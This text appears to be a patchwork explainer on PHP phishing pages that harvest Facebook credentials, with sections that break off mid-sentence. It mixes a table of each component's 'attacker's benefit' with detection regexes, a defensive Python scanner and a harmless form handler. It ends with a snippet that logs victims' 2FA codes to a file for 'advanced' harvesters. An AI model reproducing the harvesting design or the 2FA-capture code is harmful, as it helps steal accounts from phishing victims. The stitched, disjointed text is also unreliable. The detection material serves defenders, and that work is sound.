Phishing typically involves creating a fake webpage or message that appears to be from a legitimate source. The goal is to trick the victim into entering their personal information on the fake site.
| Component | Purpose | Attacker's Benefit |
| :--- | :--- | :--- |
| $_SERVER['REQUEST_METHOD'] | Ensures the script only runs on POST requests. | Prevents bots from triggering the redirect accidentally. |
| $_POST['email'] , $_POST['pass'] | Superglobals that capture form data. | Directly harvests credentials. |
| $_SERVER['REMOTE_ADDR'] | Records the victim's IP address. | Used for geo-targeting or selling "leads." |
| file_put_contents('logs.txt', ..., FILE_APPEND) | Appends credentials to a flat file. | Simple, no database required. Attacker retrieves logs.txt via HTTP or FTP. |
| header('Location: https://www.facebook.com/login.php') | The keystone: immediate redirection. | Victim is unaware of the theft because they end up on FB. |
| Component | Weakness | Detection Method |
| :--- | :--- | :--- |
| `$_POST['email']` | Plaintext credential handling | Regex for `$_POST\['(email\|pass\|password\|login)'\]` |
| `file_put_contents("log.txt")` | Writes world-readable credential file | Monitor file creation with inotify or auditd |
| `header("Location: ...")` | Redirect to Facebook after theft | Check for unexpected 302 to facebook.com not from an FB domain |
| `mail()` usage | Sends plaintext credentials over SMTP | Alert on `mail()` with suspicious content (FB log, `$email:$pass`) |
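The detection table above can be turned into a static scanner for uploaded PHP files. The following is an added example, not code from the original page: it applies the table's indicators (credential superglobals, flat-file logging, a redirect to facebook.com, IP capture, `mail()`) to PHP source and scores each file; the weights, threshold and the two constructed sample files are assumptions made for this example.

```python
import re

# Each indicator pairs a regex over PHP source with a weight (weights are an
# assumption for this example); the patterns follow the detection table above.
INDICATORS = {
    "post_credential": (re.compile(r"\$_POST\s*\[\s*['\"](?:email|pass|password|login)['\"]\s*\]"), 2),
    "flat_file_log":   (re.compile(r"file_put_contents\s*\(\s*['\"]([^'\"]+)['\"]"), 2),
    "fb_redirect":     (re.compile(r"header\s*\(\s*['\"]Location:\s*(https?://(?:www\.)?facebook\.com[^'\"]*)", re.I), 3),
    "ip_capture":      (re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]"), 1),
    "mail_call":       (re.compile(r"\bmail\s*\("), 1),
}
# Assumption: credential capture + flat-file log + Facebook redirect clears the
# threshold, while an ordinary contact form that only calls mail() does not.
THRESHOLD = 5

def scan_php(source: str) -> dict:
    """Score one PHP file: which indicators hit, the file written, the redirect target."""
    hits, details = [], {}
    for name, (rx, weight) in INDICATORS.items():
        m = rx.search(source)
        if m:
            hits.append(name)
            if m.groups():           # keep the log path / redirect URL for the analyst
                details[name] = m.group(1)
    score = sum(INDICATORS[n][1] for n in hits)
    return {"score": score, "suspicious": score >= THRESHOLD, "hits": hits, "details": details}

# Constructed samples: a handler shaped like the first table above, and a benign contact form.
HARVESTER = """<?php
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
  $ip = $_SERVER['REMOTE_ADDR'];
  file_put_contents('logs.txt', $_POST['email'] . ':' . $_POST['pass'] . "\\n", FILE_APPEND);
  header('Location: https://www.facebook.com/login.php');
}"""
CONTACT_FORM = """<?php
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
  mail('owner@example.com', 'Contact', $_POST['message'] . ' from ' . $_POST['email']);
  header('Location: /thanks.html');
}"""

if __name__ == "__main__":
    for label, src in (("harvester", HARVESTER), ("contact form", CONTACT_FORM)):
        print(label, scan_php(src))
```

Run it over a web root with `find . -name '*.php'` and feed each file's contents to `scan_php`; files over the threshold are triage candidates, and the recorded log path is where to look for harvested data.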
The following PHP example demonstrates a simple form handler. This should not be used for phishing or any malicious activity.
```php
<?php
// Simple form handler example
// Check if the form has been submitted
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Collect post data; htmlspecialchars() only neutralises HTML for output,
    // it is not input validation. The null coalescing avoids undefined-index notices.
    $email = htmlspecialchars($_POST['email'] ?? '');
    $password = htmlspecialchars($_POST['password'] ?? '');
    // Normally, you wouldn't just echo, but this is for illustration
    echo "Email: " . $email . ", Password: " . $password;
    // In a real application, you'd store or use these securely
    // NEVER store passwords in plain text or send them unencrypted
}
// HTML form for demonstration; PHP_SELF is escaped because it reflects the request URI
?>
<form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post">
Email: <input type="text" name="email"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Submit">
</form>
```
log.txt (if present) to notify them. If you see or receive phishing attempts, report them to the platform being impersonated (e.g., Facebook's report feature) and to your email provider if you received it via email.
Instead of just stealing passwords, advanced post.php scripts also steal session cookies or 2FA tokens.
```php
// After capturing email/pass, capture any POSTed 2FA code
if (isset($_POST['twofactor'])) {
    $twofactor = $_POST['twofactor'];
    file_put_contents('2fa_codes.txt', "$email:$twofactor\n", FILE_APPEND);
    // Then redirect to a real Facebook 2FA page
}
```